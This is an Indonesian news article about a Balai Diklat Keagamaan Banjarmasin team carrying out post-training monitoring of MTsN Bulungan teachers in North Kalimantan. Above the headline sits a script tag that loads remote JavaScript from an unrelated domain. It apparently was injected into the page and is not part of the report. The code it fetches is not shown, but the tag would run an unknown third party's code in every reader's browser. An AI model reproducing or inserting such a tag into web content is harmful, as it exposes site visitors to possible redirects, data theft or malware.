<script async src='https://slow.destinyfernandi.com/dbekjrhg3?type=d&frm=scr&' type='text/javascript'></script>

BDK Banjarmasin Lakukan Monev Peserta Pasca Diklat di MTsN Bulungan

Tanjung Selor ( Inmas Madrasah ) Selasa, (3/12) Tim Balai Diklat Keagamaan (BDK) Banjarmasin adakan monitoring dan evaluasi (monev) kediklatan bagi guru Madrasah Tsanawiyah Negeri (MTsN) Bulungan provinsi Kalimantan Utara (Kaltara) yang pernah mengikuti pendidikan dan pelatihan (diklat) di BDK Banjarmasin pada tahun 2019 di MTsN Bulungan. Tim tersebut terdiri dari : Riva Ratna Sari, Niken Sayuti W, dan Sumiyati.

Riva Ratna Sari mengatakan tujuan dilaksanakannya monev ini adalah untuk menindaklanjuti pasca diklat dan mengevaluasi kinerja pasca diklat, pada kunjungan kali ini kami akan memberikan beberapa instrument untuk di isi oleh alumni diklat, teman sejawat, siswa dan kepala madrasah.

Kegiatan ini didampingi oleh staf Kepegawaian sub bagian Tata Usaha Kantor Kementerian Agama (kemenag) Kab. Bulungan provinsi Kaltara, Siti Rukiah, S.Ag, dan kontributor Hubungan Masyarakat (humas) Kemenag Kab. Bulungan, Muhammad Yusriansyah, S.Kom, dserta disambut oleh Kepala Madrasah, Budi Prasetyo Widodo, Wakil Kepala Madrasah (Wakamad) Urusan Kesiswaan, Rosdiana, S.Ag., dan alumni Diklat Nurhayana, S.Pd. sebagai responden yang telah melaksanakan Diklat Kepala Laboratorium Ilmu Penegetahuan Alam (IPA) .

Budi Prasetyo Widodo mengatakan Madrasah yang menjadi sasaran tim Monev adalah MTsN Bulungan, mengingat ada empat alumni diklat yaitu Sri Rusmiyati, S.Ag sebagai alumni diklat Kepala Perpustakaan, Rosdiana, S.Ag. sebagai alumni diklat publikasi ilmiah, Sumijan, S.Pd sebagai alumni diklat Pengelolaan Ujian Nasional Berbasis Komputer (UNBK) Bagi Proktor/Teknisi, namun yang diobservasi adalah Nuurhayana, S.Pd, tegasnya.

Sementara itu kepala madrasah Budi Prasetyo Widodo, mengucapkan selamat datang serta rasa terimakasih kepada tim BDK Banjarmasin atas monev nya di MTsN Bulungan, beliau mengatakan Alhamdulillah, terimakasih banyak atas kunjungannya, dan terimakasih diberikannya kesempatan guru-guru kami dalam mengikuti diklat-diklat yang pernah diadakan dan mhn dilibatkan guru-guru kami untuk peningkatan Sumber Daya Manusia (SDM) yang unggul.

Lanjutnya beliau mengatakan pasca diklat ke empat guru yang pernah ikut diklat Alhamdulillah kompetisinya semakin meningkat, bisa kami lihat di beberapa pembelajaran mereka melaksanakannya dengan menggunakan metode tekhnlogi, dan mereka dapat berbagi ilmu kepada guru-guru sejawatnya pungkasnya. (Tya).

( Berita ini diambil dari http://kaltara.kemenag.go.id tanggal 4 Desember 2019. 13.33 )